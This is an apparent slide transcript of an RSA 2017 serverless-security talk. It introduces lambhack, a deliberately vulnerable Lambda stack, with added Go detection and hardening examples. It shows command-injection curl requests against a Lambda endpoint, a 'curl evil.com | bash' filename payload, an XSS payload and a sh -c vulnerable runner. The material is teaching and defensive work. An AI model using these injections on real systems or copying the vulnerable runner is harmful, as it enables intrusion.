Serverless Security: Are you ready for the Future?



Talk from RSA 2017 on serverless security and the four areas of growth for security in the world of serverless. The talk also includes the first release of lambhack, an open source, deliberately vulnerable Lambda-based serverless stack that demonstrates arbitrary code execution in Lambda.


  1. #RSAC Session ID: ASD-F01. Serverless Security: Are you ready for the Future? James Wickett, Head of Research, Signal Sciences, @wickett
  2. James Wickett: Head of Research at Signal Sciences; author of DevOps Fundamentals at lynda.com; author of a book on DevOps (email james@signalsciences.com for a free copy); blogger at theagileadmin.com and labs.signalsciences.com
  3. Conclusion: Serverless encourages functions as deploy units, coupled with third-party services that allow running end-to-end applications without worrying about system operation. New serverless patterns are just emerging. Security with serverless is easier, and security with serverless is harder.
  4. Conclusion (2): Four key areas apply to serverless security: software supply chain security, delivery pipeline security, data flow security, attack detection. New: a very vulnerable Lambda stack, open source at github.com/wickett/lambhack
  5. What is Serverless?
  6. Misconceptions
  7. It's marketing (cloud rebranded)
  8. Serverless == no servers
  9. Serverless == Backend as a Service
  10. Serverless == Platform as a Service
  11. TK: AdrianCO quote
  12. So, what is Serverless?
  13. http://martinfowler.com/articles/serverless.html
  14. @mikebroberts
  15. "Serverless was first used to describe applications that significantly or fully depend on 3rd party applications / services ('in the cloud') to manage server-side logic and state." http://martinfowler.com/articles/serverless.html
  16. "Serverless can also mean applications where some amount of server-side logic is still written by the application developer but unlike traditional architectures is run in stateless compute containers that are event-triggered, ephemeral (may only last for one invocation), and fully managed by a 3rd party." http://martinfowler.com/articles/serverless.html
  17. History of Serverless: 2012, used to describe BaaS and continuous integration services run by third parties; late 2014, AWS launched Lambda; July 2015, AWS launched API Gateway; October 2015, AWS re:Invent talk "The Serverless Company Using AWS Lambda" (http://www.slideshare.net/AmazonWebServices/arc308-the-serverless-company-using-aws-lambda); 2015 to present, frameworks forming; 2016, Serverless Conference
  18. Old-school architecture (diagram): client, proxy/load balancer in front of several servers, database
  19. Serverless architecture (diagram): client, auth service, API Gateway, Function A and Function B, database service, web delivery
  20. (image only)
  21. What can we say is serverless?
  22. Serverless is Functions as a Service (FaaS)
  23. Containers on demand
  24. Serverless is (no management of) servers
  25. Serverless is service-full
  26. Serverless is an opinionated framework for compute
  27. Serverless encourages functions as deploy units, coupled with third-party services that allow running end-to-end applications without worrying about system operation.
  28. A short history of cloud
  29. Virtualization
  30. "The Cloud"
  31. DevOps
  32. SaaS, PaaS, IaaS
  33. Private cloud
  34. Then, along came containers
  35. containers are teh hawtness
  36. (image only)
  37. Lots of effort in container orchestration
  38. The cloud was to virtualization as serverless will be to containers
  39. "If you want to lead your company bravely into the new world, you would do well to focus a lot on how serverless will evolve." - @Cloudopinion, https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
  40. Serverless encourages functions as deploy units, coupled with third-party services that allow running end-to-end applications without worrying about system operation.
  41. So, what are the upsides?
  42. Scaling built in
  43. Pay for what you use, in 100 ms increments
  44. With serverless, the system administration burden is (mostly) lower
  45. Serverless is implicit microservices
  46. Short-circuits Ops and moves the infrastructure runtime closer to devs
  47. You can skip Chef-ing and Docker-ing all the things!
  48. Lean Startup friendly
  49. Increased velocity
  50. Great, what's the catch?
  51. Ops burden to rationalize the serverless model (specifically deploy)
  52. Monitoring
  53. Logging
  54. Stateless for real, with no persistence* across function runs (* the asterisk matters: later in this deck a file written to /tmp is still there on the next invocation because the execution container was reused, so /tmp is a cache you cannot rely on and state an attacker can plant)
  55. Vendor lock-in
  56. Security
  57. Reliability
  58. (image only)
  59. Serverless use cases
  60. Image resizing
  61. Queue processing (http://martinfowler.com/articles/serverless.html)
  62. Run a web application
  63. API Gateway (http://martinfowler.com/articles/serverless.html)
  64. CI/CD
  65. Security is the same and different
  66. What used to be system calls is now distributed computing over the network
  67. Serverless shifts attack surface to third parties
  68. Let's try a sample application in AWS
  69. Go Sparta: Golang! AWS Lambda lets you ship your own binary in the deployment package; Sparta wraps that binary with a node.js shim
  70. (image only)
  71. Other options: Serverless Framework, Apex, Kappa
  72. Wordy: analyzes textual occurrences in a given block of text and returns a JSON count of words; calls an API under the hood to get the text; comprised of Lambda, S3 and API Gateway
  73. to 75. (image-only slides)
  76. go run main.go provision -s S3_BUCKET
  77. to 85. (image-only slides)
  86. What I learned about serverless security
  87. (image only)
  88. Security
  89. Four areas of serverless security: secure software supply chain, delivery pipeline, data flow security, attack detection
  90. Secure software supply chain
  91. Surface area reduction!
  92. Surface area expansion!
  93. SSL/TLS from the provider
  94. New way vs. old way (diagram)
  95. Routing from the provider
  96. Old way vs. new way (diagram)
  97. (image only)
  98. Lambda + S3 + Kinesis + DynamoDB + CloudFormation + API Gateway + Auth0
  99. Abuse of open IAM privileges (see "Gone in 60 Milliseconds", 33C3: https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds). A function's execution role is the blast radius: whatever that role can reach, a code-execution bug in the function can reach too.
  100. Recommendation: use a third-party service to monitor for provider config changes
  101. Provider security: disable root access keys; manage users with profiles; secure your keys in your deploy system; secure keys in dev systems; use the provider's MFA
  102. Delivery pipeline security
  103. (image only)
  104. Unit testing
  105. Easier to mock vs. harder to mock (diagram)
  106. (image only)
  107. Integration testing
  108. Configuration is part of delivery
  109. (image only)
  110. Simple deploy pipeline security: only dev keys can push to 'dev'; only the build/deploy system can push to pre-prod; integration tests must pass in that environment; security validation must take place; pushes to prod are allowed only from the deploy system
  111. Security integration testing: BDD-Security (github.com/continuumsecurity/bdd-security), Gauntlt (gauntlt.org)
  112. http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
  113. Data flow security: in development, data flow diagrams and threat modeling; at runtime
  114. "Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner." https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
  115. Application-layer DoS
  116. Timeouts and execution restrictions
  117. Attack detection
  118. https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4
  119. AppSec greatest hits (XSS, SQLi, command execution) are still relevant 15 years later!
  120. AppSec problems
  121. Types of attacks: XSS, injection, deserialization, ... New surface area, similar problems, e.g. appending 'curl evil.com | bash' or <script>alert(1)</script> to the filename of a file you upload to S3
  122. Defense: logging and emitting events; the Vandium wrapper (SQLi); Content Security Policy (CSP); more needs to be done here...
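Slide 122 puts logging and emitting events first, but a log is only a defense if something reads it. The following Go program is an added example, not code from the talk or from lambhack: it scans a handful of constructed access-log lines, modelled on the lambhack requests shown later in this deck, for the two payload classes slide 121 names (shell metacharacters in a query value, and a script tag in an uploaded filename). The log layout ("timestamp method path query"), the field positions and the rule set are assumptions for illustration; real API Gateway access logs need their own parser, and a real detector would emit these findings as events rather than print them.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Finding is one suspicious request pulled out of the log.
type Finding struct {
	Line   string
	Reason string
}

// SampleLog is constructed for this example. It imitates the lambhack
// requests from the talk in an assumed "timestamp method path query" layout;
// it is not a real API Gateway access-log format.
const SampleLog = `2017-02-08T22:01:55Z GET /prod/serverless-audit/c args=uname+-a
2017-02-08T22:02:03Z GET /prod/serverless-audit/c args=uname+-a%3B+sleep+1
2017-02-08T22:02:10Z GET /prod/serverless-audit/c args=touch+/tmp/wickettfile%3B+sleep+1
2017-02-08T22:02:20Z GET /prod/serverless-audit/c args=curl+evil.com+%7C+bash
2017-02-08T22:02:31Z PUT /prod/upload name=%3Cscript%3Ealert(1)%3C/script%3E.png
2017-02-08T22:02:40Z GET /prod/health`

var (
	// Shell syntax that turns a "command argument" into a second command.
	shellMeta = regexp.MustCompile("[;|&`]|\\$\\(")
	// The stored-XSS shape from slide 121: a script tag in a filename.
	scriptTag = regexp.MustCompile(`(?i)<script|javascript:`)
)

// Classify returns a reason for a decoded query value, or "" if it is clean.
func Classify(value string) string {
	switch {
	case shellMeta.MatchString(value):
		return "shell metacharacter in query value"
	case scriptTag.MatchString(value):
		return "script payload in query value"
	}
	return ""
}

// ScanLog walks the log line by line, URL-decodes each query string and
// applies Classify to every value. Decoding first matters: %3B becomes ";"
// for the shell on the other side, so it must be ";" for the detector too.
func ScanLog(log string) []Finding {
	var findings []Finding
	for _, line := range strings.Split(log, "\n") {
		fields := strings.Fields(line)
		if len(fields) < 4 {
			continue // no query string on this request
		}
		values, err := url.ParseQuery(fields[3])
		if err != nil {
			// A query string the parser rejects is worth a look on its own.
			findings = append(findings, Finding{line, "unparseable query string: " + err.Error()})
			continue
		}
		for key, vs := range values {
			for _, v := range vs {
				if reason := Classify(v); reason != "" {
					findings = append(findings, Finding{line, fmt.Sprintf("%s (%s=%q)", reason, key, v)})
				}
			}
		}
	}
	return findings
}

func main() {
	for _, f := range ScanLog(SampleLog) {
		fmt.Printf("ALERT %s\n      %s\n", f.Reason, f.Line)
	}
}
```

On the sample above the first request (a plain "uname -a") passes, the three with ";" or "|" in the decoded value are flagged as shell metacharacters, and the upload with the script tag in its filename is flagged as a script payload. The rules are deliberately narrow; the point is where the check runs (on decoded values, on the provider's access log) rather than the regexes themselves.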
  123. New thing alert! The point is that appsec is still relevant in serverless: a vulnerable Lambda + API Gateway stack (born from the heritage of WebGoat, RailsGoat, Gruyere, ...). Introducing lambhack
  124. (image only)
  125. lambhack: a vulnerable Lambda + API Gateway stack; open source, MIT licensed; released for the first time here at RSA; includes arbitrary code execution via a query string; more work needed, PRs accepted, looking for community help. github.com/wickett/lambhack
  126. Vulnerable code is also vulnerable in serverless:
       //command := lambdaEvent.PathParams["command"]
       command := lambdaEvent.QueryParams["args"]
       output := runner.Run(command)
  127. Let's take a look at cmdexe in lambhack
  128. uname -a:
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=uname+-a;+sleep+1"
       > Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
  129. cat /proc/version:
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=cat+/proc/version;+sleep+1"
       > Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) SMP Tue Dec 6 20:30:04 UTC 2016
  130. Let's see /tmp:
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=ls+-la+/tmp;+sleep+1"
       total 17916
       drwx------  2 sbx_user1056 490      4096 Feb 8 22:02 .
       drwxr-xr-x 21 root         root     4096 Feb 8 21:47 ..
       -rwxrwxr-x  1 sbx_user1056 490  18334049 Feb 8 22:02 Sparta.lambda.amd64
  131. Lambda reuse! A file touched in one invocation is still there in the next, because the execution container was reused:
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=ls+/tmp;+sleep+1"
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/pargs=touch+/tmp/wickettfile;+sleep+1"
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/args=ls+/tmp;+sleep+1"
       > Sparta.lambda.amd64 wickettfile
  132. Could we upload our own payload?
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=which+curl;+sleep+1"
       > /usr/bin/curl
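The three lines on slide 126 are the whole bug: the query-string value reaches a runner that hands it to a shell, which is why ";+sleep+1" is honoured. The Go below is an added example, not lambhack's own code: runner.Run is not shown in the deck, so VulnerableRun's use of "sh -c" is an assumption about its behaviour that matches the demo. Beside it is a hardened handler that never spawns a shell, restricts the program to a hypothetical allowlist, and rejects arguments outside a conservative character class, so ";", "|" and "$()" are data rather than syntax. The names VulnerableRun, ParseArgs, SafeRun and allowedCommands are mine.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"regexp"
	"strings"
)

// VulnerableRun is the assumed shape of lambhack's runner: the raw query
// value becomes a shell command line, so "uname -a; sleep 1" runs two
// commands. Kept only to show the contrast; do not ship this.
func VulnerableRun(args string) (string, error) {
	out, err := exec.Command("sh", "-c", args).CombinedOutput()
	return string(out), err
}

// allowedCommands is a hypothetical allowlist for the hardened handler.
var allowedCommands = map[string]bool{"uname": true, "ls": true}

// safeArg permits only characters a path or flag needs; anything the
// shell would treat specially is outside the class.
var safeArg = regexp.MustCompile(`^[A-Za-z0-9_./-]+$`)

// ParseArgs turns the untrusted query value into an argv that is safe to
// hand to exec.Command: fixed set of programs, no shell, conservative args.
func ParseArgs(raw string) ([]string, error) {
	fields := strings.Fields(raw)
	if len(fields) == 0 {
		return nil, errors.New("empty command")
	}
	if !allowedCommands[fields[0]] {
		return nil, fmt.Errorf("command %q not allowed", fields[0])
	}
	for _, f := range fields[1:] {
		if !safeArg.MatchString(f) {
			return nil, fmt.Errorf("argument %q rejected", f)
		}
	}
	return fields, nil
}

// SafeRun executes only what ParseArgs accepts, as a separate argv with no
// shell in between, so metacharacters cannot splice in a second command.
func SafeRun(raw string) (string, error) {
	argv, err := ParseArgs(raw)
	if err != nil {
		return "", err
	}
	out, err := exec.Command(argv[0], argv[1:]...).CombinedOutput()
	return string(out), err
}

func main() {
	// The first request is what the demo sent; the others are the payloads
	// from slides 121 and 131 and are refused before anything executes.
	for _, q := range []string{"uname -a", "uname -a; touch /tmp/wickettfile", "curl evil.com | bash"} {
		out, err := SafeRun(q)
		fmt.Printf("%-40q -> out=%q err=%v\n", q, strings.TrimSpace(out), err)
	}
}
```

The allowlist is the real control; the character class only keeps the allowed programs from being driven somewhere unexpected with a crafted argument. Even with both, the function's IAM role still bounds what a successful "uname -a" can reach, which is the point of slide 99.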
  133. XSS, SQLi, ... more to come!
  134. Email me if you are interested: james@signalsciences.com
  135. Conclusion: as on slide 3
  136. Conclusion (2): as on slide 4
  137. (image only)
  138. Let's talk! James Wickett, james@signalsciences.com, @wickett
